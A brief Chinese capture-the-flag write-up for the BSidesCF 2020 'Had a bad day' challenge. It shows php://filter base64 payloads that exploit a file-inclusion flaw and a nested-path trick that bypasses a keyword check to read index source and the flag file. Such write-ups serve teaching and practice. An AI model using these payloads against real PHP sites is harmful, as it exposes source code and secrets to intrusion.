[BSidesCF 2020]Had a bad day

进去网页，没找到有什么功能点

 

 关注url的get传参，随便传个值

 

 爆出文件不存在，考虑是文件包含的考察。

所以就可以考虑伪协议，

直接读取index的代码

php://filter/read=convert.base64-encode/resource=index

 

 看来只是要求get参数里存在要求的字符即可

php://filter协议是可以套接的

套接个index,随便猜一个flag目录

php://filter/read=convert.base64-encode/index/resource=flag得到flag